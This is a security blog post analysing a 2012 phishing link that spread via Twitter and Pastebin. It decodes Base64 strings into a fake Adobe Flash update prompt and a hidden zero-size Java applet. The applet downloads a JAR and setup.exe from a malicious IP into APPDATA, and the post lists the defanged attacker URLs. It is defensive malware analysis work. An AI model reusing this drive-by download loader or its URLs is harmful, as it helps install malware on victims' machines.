Journey of a Phishing Link

We come across so many links via social networking websites, and we unknowingly click on many of them. The malicious links have catastrophic results and the system, as well as yours privacy, is either compromised or your data takes the hit. This is an analysis of a link dated 17-April-2012 that I came across via Twitter and LinkedIn.

NOTE: All links have been appended with ‘non-clickable’ suffix “hxxp://” to prevent mistaken clicks.

Someone posted this link hxxp://pastebin.com on a tweet. On checking, it was a list of URLs actually single URL pasted multiple times – a sign of desperation:

  1. hxxp://tinyurl.com/saw87hujnworeg
  2. hxxp://tinyurl.com/saw87hujnworeg
  3. hxxp://tinyurl.com/saw87hujnworeg
  4. hxxp://tinyurl.com/saw87hujnworeg
    9954 credit card numbers

It states this link has 9954 credit card numbers. The first malicious hint is – Why not posting it directly rather than pasting the same link 4 times in an entry.

Next, this is too much of a luring target to walk safe. Therefore, I opened the link in Malzilla (hxxp://malzilla.sourceforge.net/) – a malware hunting tool. I disabled the auto-redirect. The link “hxxp://tinyurl.com/saw87hujnworeg” redirected to “hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b”, which opened as text fields with scripts. The file contained only a ‘doubtful’ script with some headings and titles.

Here is the only important script contained within the page. Let us do the analysis.

This script – if too complex to understand due to large variable names – so let’s first change the variable names to shorter versions for better understanding. Here is the modified script with short variable names without changing the logic and working of it.

Now, it is easy to understand the logic and working of the script. First, let us decode the set Timeout and document.write fields. They look like Base64 Encoded so, let us try to decode them. The encoded strings are:

  1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlI
    GxhdGVzdCB2ZXJzaW9uIQ==
  2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTE
    yYzQ4NzVhMGY3NDk2NWI=
  3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGF
    yY2hpdmU9Imh0dHA6Ly8yM

    TIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY
    1Yi5qYXIiPg0KCQk8cGFyYW
    0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTB
    iNzQwZWJjYzJhYmJjNTU
    xMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NC
    gkJPHBhcmFtIG5hbWU9Ikxl
    Z3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2Fwc
    GxldD4=

And the Decoded strings are:

(Adobe Flash must be updated to view this, please install the latest version!)

  1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
  2. <applet width=”0px” height=”0px” code=”SiteLoader.class”
  3. archive=”hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar”>
    <param name=”wcZPN”
    value=”hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b”>
    <param name=”v8TOX” value=”setup.exe”>
    <param name=”Legym” value=”www.dogscast.com”>
    <param name=”MpBDG” value=”APPDATA”>
    </applet>

The first decoded string has been set to entice the victim to click installing the ‘latest version’ of flash via their malicious link. So, we can see, it will again issue a GET request to the following links:

  1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
  2. hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar
  3. hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b

And parameters are:

  1. name=”wcZPN”
    value=”hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b
  2. name=”v8TOX” value=”setup.exe
  3. name=”Legym” value=”www.dogscast.com”
  4. name=”MpBDG” value=”APPDATA”

Let us now access these URLs.

  1. First I accessed the adobe.php URL
    (hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla and it downloaded a file “Adobe-Flash_WIN.exe” on my system. The size of this file is approx 1.16 Mb. This file when scanned via VirusTotal had the catch rate of 2/42 anti-malware products. Now, this is scary. I did not get a chance to do the runtime analysis of this file but yes, I will post it in my next blog.
  2. On accessing the second URL
    (hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar), it downloads a JAR file “0b740ebcc2abbc5512c4875a0f74965b.jar”. This file when extracted results in the “META-INF” directory and “SiteLoader.class” file. The contents of META-INF includes,
  3. JUBUHUSE.DSA
  4. JUBUHUSE.SF
  5. MANIFEST.MF
  6. Now let us analyze the third URL load.php
    (hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla. When accessed, this link downloads a “setup.exe” file on the host. This file is the same as the previous file as per the SHA56 hash “cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5”.

This is a brief analysis of a phishing link, which started via twitter as a PASTEBIN link, and made its way to reach your system through various files.

Author:

Rishi Narang
Senior Consultant,
Aujas